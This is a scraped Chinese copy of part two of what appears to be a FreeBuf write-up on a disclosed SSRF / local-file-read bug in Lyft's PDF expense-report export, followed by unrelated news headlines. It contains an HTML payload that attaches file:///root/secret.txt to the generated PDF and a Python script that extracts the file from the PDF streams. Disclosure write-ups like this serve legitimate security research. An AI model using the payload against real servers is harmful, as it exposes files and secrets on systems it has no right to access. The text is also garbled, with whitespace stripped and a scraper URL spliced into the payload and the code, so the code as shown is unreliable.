FreeBuf Lyft费用报告导出功能的SSRF漏洞分析( 二 )
<linkrel=attachmenthref=https://pcff.toutiao.jxnews.com.cn/p/20200625/”file:///root/secret.txt”>最终 , 利用数据压缩函数库zlib以及python,我们写了一个从PDF文件中解包本地文件的脚本 , 如下:
importsys,zlibdefmain(fn):data=https://pcff.toutiao.jxnews.com.cn/p/20200625/open(fn,'rb').readi=0first=Truelast=NonewhileTrue:i=data.find(b'>>nstreamn',i)ifi==-1:breaki+=10try:last=cdata=https://pcff.toutiao.jxnews.com.cn/p/20200625/zlib.decompress(data[i:])iffirst:first=Falseelse:pass#printcdataexcept:passprint(last.decode('utf-8'))if__name__=='__main__':main(*sys.argv[1:])最后一程在本地环境测试中 , 我们把上述脚本结合Lyft的PDF生成机制设置了一个包含Payload的行程记录 , 在导出PDF报告的过程中 , 触发了其中的SSRF利用 , 获取到了相应的用户信息 , 确认了漏洞的存在 , 如下:
文章图片
致谢感谢Lyft安全团队 , Daeken的思路、@d0nutptr的漏洞验证 , 更多技术细节请查看HackerOne报告-H-885975 。
漏洞上报和处理过程2018.11.10-我初次发现漏洞
2018.11.29-在纽约比赛中与@Daeken合作完成POC
2018.11.29-报送Lyft安全团队
2018.11.29-Lyft修复漏洞
2018.11.30-Lyft告知漏洞已修复
2018.12.05-Lyft按其最高众测标准给予漏洞赏金
【FreeBuf Lyft费用报告导出功能的SSRF漏洞分析】2020.5.20-漏洞公开
*参考来源:nahamsec , clouds编译整理 , 转载请注明来自FreeBuf.COM
精彩推荐
文章图片
- 调查|公共卫生事件期间 对冲基金为何仍然坚持收取高额费用
- FreeBufDEDECMS伪随机漏洞分析
- 封面新闻|多地核酸检测价格进一步下调 联合集采降低核酸检测试剂费用
- 费用|驾考已恢复,但想考不容易,驾校校长说:要么继续等,要么就交费改“班次”
- 『石油』又涨价了?俄罗斯石油出口拟加收455%费用,7月对华供应350万吨
- 明明在等|她是瑜伽老师,与成龙合作后走红,现在她的瑜伽授课费用暴涨
- FreeBufWerkzeug更新带来的Flask debug pin码生成方式改变
- 「凤凰男」凤凰男的算盘:“反正你家有钱,我弟出国留学的费用你包了”
- 军武论道|要求将驻日美军费用提高4倍,称:你们有钱,特朗普狮子大开口
- APP开发贝如科技 APP开发费用为什么会有这么大的区别?